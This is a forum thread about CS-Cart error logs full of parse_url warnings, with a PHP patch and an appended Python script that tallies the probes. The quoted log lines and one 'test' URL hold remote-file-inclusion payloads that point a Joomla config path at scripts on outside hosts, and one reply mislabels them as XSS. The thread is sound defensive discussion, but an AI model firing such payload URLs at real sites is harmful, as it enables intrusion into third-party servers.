Crazy Error Logs

Anybody have a clue what all this means? Almost looks like I’ve been hijacked.



I have about 70 lines of stuff like this:



[28-Feb-2010 09:01:10] PHP Warning: parse_url(//components/com_toolbar/toolbar.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1?) [function.parse-url]: Unable to parse URL in /home/username/public_html/addons/seo/func.php on line 702

[28-Feb-2010 09:01:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/username/public_html/addons/seo/func.php:702) in /home/username/public_html/core/fn.init.php on line 400



and:



[01-Mar-2010 22:41:44] PHP Warning: parse_url(//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???) [function.parse-url]: Unable to parse URL in /home/username/public_html/addons/seo/func.php on line 702

[01-Mar-2010 22:41:44] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/username/public_html/addons/seo/func.php:702) in /home/username/public_html/core/fn.init.php on line 400

[01-Mar-2010 15:41:44] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/username/public_html/addons/seo/func.php:702) in /home/username/public_html/core/fn.control.php on line 455



I went to some of these links and they’re all in Chinese.

Hacking in progress… XSS attack



Script Kiddies in action.



More here:



http://en.wikipedia.org/wiki/Cross-site_scripting

Check with your host to see if they have upgraded or made any changes to server software.



I was getting errors like that, not as many as you; it was down to the host making changes to server software.

Next time, try not to go to these links, especially if you are on Windows.

Those links include exploits that inject some stuff to your computer if you are not properly protected. ^^



Next, I’ve posted and raised this issue with helpdesk before already.

Same error logs.

I’ve gone through the code and realized that these error logs are being output because the cscart code uses the PHP function parse_url to parse the URLs. And since these URLs are malformed, the PHP function generates a warning to inform you that these URLs are not parsable.



It is fine for your site, since the URLs are not parsable by the script, and will be discarded.



But if you are like me and hate having the error log generated each and every time this kind of URL is applied to your site, and yet would like to monitor the frequency of such visits, you can apply my code as below. Tested and working.

The problem is the PHP warning for injection URLs creating error log entries. I’ve stopped the generation of the lines within error.log due to the E_WARNING message at line 703 of seo/func.php using parse_url, which will emit a warning for malformed URLs. This is the code:

// @ suppresses the E_WARNING from parse_url(); a FALSE return is logged to a separate file instead
if (($parse_result = @parse_url($_SERVER['REQUEST_URI'])) === false) {
    // Error has been caught here ($url_pattern is not assigned in this branch)
    file_put_contents("parse_errors.log", date('Y-m-d H:i:s').": parse_url() return FALSE on \"".$_SERVER['REQUEST_URI']."\" at ". __LINE__ ." in ". __FILE__ ." \n", FILE_APPEND);
} else {
    $url_pattern = $parse_result;
}




You can try it with the following url


demo.cs-cart.com//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.koreadefence.net/data/.psy/id1.txt?




And it will work with any malformed urls.

I do not think it is wise to just suppress the warning, and by handling it specifically via a custom log file, it shows that extra care is taken by the script to handle possible URL injection attacks.



To add on, this solution was shared with cscart helpdesk on 5th Feb. Their reply is “Thanks for the information we will analyze it.”



Hope it helps.

Wow, thanks nodame! Great catch… and fix.



Two questions:



Are these just random drive by attempts?



And, where exactly do I put that code?



I just moved to a new host when this started, I’m wondering about their firewall situation.



Thanks



James

[quote name=‘ePlanetDesign’]Wow, thanks nodame! Great catch… and fix.



Two questions:



Are these just random drive by attempts?



And, where exactly do I put that code?



I just moved to a new host when this started, I’m wondering about their firewall situation.



Thanks



James[/QUOTE]



Hi James,



Most probably it is random. Or if your URL was using virtuemart previously, it might have been indexed by these crawlers before.



It should be safe for cscart, since it is injection via URL, trying to exploit some vulnerabilities of virtuemart code. Just that I did not like that the cscart script did not properly handle such malformed URL possibilities. (Although I will hate it if they purely do a @ to suppress it. Proper exception and error catching handling should be done. My way is not really proper but it works as a quick fix. )



Sorry that I’ve left out where to put the code. ^^



In addons/seo/func.php, look for the code:


$url_pattern = parse_url($_SERVER['REQUEST_URI']);
$rewrite_rules = fn_get_rewrite_rules();




replace it with


// @ suppresses the E_WARNING from parse_url(); a FALSE return is logged to a separate file instead
if (($parse_result = @parse_url($_SERVER['REQUEST_URI'])) === false) {
    // Error has been caught here ($url_pattern is not assigned in this branch)
    file_put_contents("parse_errors.log", date('Y-m-d H:i:s').": parse_url() return FALSE on \"".$_SERVER['REQUEST_URI']."\" at ". __LINE__ ." in ". __FILE__ ." \n", FILE_APPEND);
} else {
    $url_pattern = $parse_result;
}
$rewrite_rules = fn_get_rewrite_rules();

Finally got a chance to try this and works like a charm… and keeps those errors out of the server error_log files and out of the cPanel errors!



Be nice to expand on it to show the IP, and then we could block those that are hack attempts. Of course if they are spoofing or regularly changing IPs that could be a full time job, hahaha.



Again, great find and great fix! Thank You



James
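For monitoring how often these probes arrive, the parse_url warnings quoted earlier in the thread can be tallied straight from the PHP error log. This is an added example, not code from any poster in the thread; the sample lines are constructed in the format shown above with placeholder hosts, and the function names are hypothetical.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in the error_log format shown above (placeholder hosts).
SAMPLE_LOG = """\
[28-Feb-2010 09:01:10] PHP Warning: parse_url(//components/com_toolbar/toolbar.php?mosConfig.absolute.path=http://files.example.invalid/img/sc1?) [function.parse-url]: Unable to parse URL in /home/username/public_html/addons/seo/func.php on line 702
[28-Feb-2010 09:01:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/username/public_html/addons/seo/func.php:702) in /home/username/public_html/core/fn.init.php on line 400
[01-Mar-2010 22:41:44] PHP Warning: parse_url(//administrator/index3.php?mosConfig_absolute_path=http://host2.example.invalid/cgi-bin/id.txt???) [function.parse-url]: Unable to parse URL in /home/username/public_html/addons/seo/func.php on line 702
[01-Mar-2010 22:50:02] PHP Warning: parse_url(http:///index.php?page=2) [function.parse-url]: Unable to parse URL in /home/username/public_html/addons/seo/func.php on line 702
"""

PARSE_FAIL = re.compile(
    r"^\[(?P<ts>[^\]]+)\] PHP Warning:\s+parse_url\((?P<uri>.*)\) "
    r"\[function\.parse-url\]: Unable to parse URL")
REMOTE_VALUE = re.compile(r"^(?:https?|ftp)://", re.I)

def php_var_name(name):
    # PHP rewrites '.' and ' ' in incoming parameter names to '_', so
    # mosConfig.absolute.path and mosConfig_absolute_path reach the same variable.
    return name.replace(".", "_").replace(" ", "_")

def probes(log_text):
    """Return one record per query parameter whose value is a remote URL."""
    found = []
    for line in log_text.splitlines():
        m = PARSE_FAIL.match(line)
        if not m:
            continue  # other warnings, e.g. "headers already sent"
        # Split by hand: a leading '//' would make urlsplit treat the first
        # path segment as a host name.
        path, _, query = m.group("uri").partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            if not REMOTE_VALUE.match(value):
                continue
            try:
                host = urlsplit(value).hostname
            except ValueError:  # unparsable remote URL, keep the record anyway
                host = None
            found.append({"time": m.group("ts"), "target": path,
                          "param": php_var_name(name), "remote_host": host})
    return found

def summarize(log_text):
    """Count probes per normalized parameter name."""
    return Counter(p["param"] for p in probes(log_text))

if __name__ == "__main__":
    for rec in probes(SAMPLE_LOG):
        print(rec)
    print(summarize(SAMPLE_LOG))
```
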